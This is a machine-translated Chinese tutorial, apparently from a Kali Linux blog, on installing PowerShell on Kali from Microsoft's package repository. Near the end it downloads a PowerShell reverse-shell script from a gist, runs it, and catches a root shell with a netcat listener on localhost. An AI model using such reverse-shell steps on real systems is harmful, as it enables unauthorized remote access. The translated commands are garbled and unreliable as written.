你可能已经意识到,您可以安全地外部存储库添加到您的卡莉Linux安装但是你可能不知道,网上的存储库包含一个来自微软,包括PowerShell。 存储库是在Kali Debian安装很好但其包,我们将显示在这篇文章中。
在卡莉PowerShell包安装
我们开始通过安装必要的依赖关系,其中大部分应该已经安装在你的卡莉默认安装。
| 1 |
恰当的更新& & apt - y安装旋度gnupg apt-transport-https
|
接下来,我们需要下载并添加公共存储库GPG密钥所以APT信任的包和包签名提醒你任何问题。
| 1 |
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key添加-
|
添加了GPG密钥,我们继续将微软包存储库添加到自己的包列表文件/etc/apt/sources.list.d /和更新可用包的列表。
| 1 2 |
回声“deb[拱= amd64]https://packages.microsoft.com/repos/microsoft-debian-stretch-prod主要“> /etc/apt/sources.list.d / powershell.list
恰当的更新
|
最后,我们继续安装powershell包。
PowerShell运行
当包安装完成后,运行pwsh将启动PowerShell,展示我们熟悉的“PS”提示。
| 1 2 3 4 5 6 7 8 |
root@kali:~ # pwsh
PowerShell v6.1.0-preview.2
版权(c)微软公司。 保留所有权利。
https://aka.ms/pscore6-docs
类型“帮助”来获得帮助。
PS /根>
|
如果你刚开始PowerShell,你可能想做的第一件事就是更新内置的帮助,这可以通过运行完成Update-HelpCmdlet。 这可能需要一段时间才能完成,但只需要运行一次罕见。
| 1 2 3 |
> Update-Help PS /根
更新Microsoft.PowerShell.Utility帮助模块
定位帮助内容……
|
如您所料,你不会找到所有的命令用于当使用在Windows PowerShell但存在所有的核心模块和代码处于不断发展和完善。
| 1 2 3 4 5 6 7 8 9 10 11 12 |
PS /根> Get-Process - name gnome *
下午NPM(K)(M)WS(M)SI ProcessName CPU(s)Id
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0 0.00 5.71 0.03 1073 072 gnome-keyring-d
0 0.00 9.80 0.19 659 649 gnome-session-b
0 0.00 13.72 0.36 1089 080 gnome-session-b
0 0.00 110.06 3.36 778 649 gnome shell
0 0.00 277.15 27.85 1170 080 gnome shell
0 0.00 11.77 0.09 1199 075 gnome-shell-cal
0 0.00 77.79 4.58 1381 080 gnome-software
0 0.00 36.58 2.03 1646 646 gnome终端
|
令人惊讶的事情之一可以然而,做的是使用PowerShell发送一个反向壳Netcat侦听器。 我们遇到了一个小PowerShell反向壳在线和令我们吃惊的是,它高兴地连接回到我们的听众。
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
root@kali:~ # pwsh
PowerShell v6.1.0-preview.2
版权(c)微软公司。 保留所有权利。
https://aka.ms/pscore6-docs
类型“帮助”来获得帮助。
PS /根> wget - q https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1
PS / root > / mini-reverse.ps1
────────────────────────────────────────────────────────────────────────────────
数控-lvnp root@kali:~ # 413
监听(任何)413…
连接(127.0.0.1)(未知)(127.0.0.1)59006
id
uid = 0(根)gid = 0(根)组= 0(根)
uname -
Linux卡莉4.15.0-kali3-amd64 # 1 SMP Debian 4.15.17-1kali1(2018-04-25)x86_64 GNU / Linux
|
我们认为这是非凡的,不仅微软开源PowerShell,他们还在不断地更新和改进,和拥有一个公共包存储库安装微风。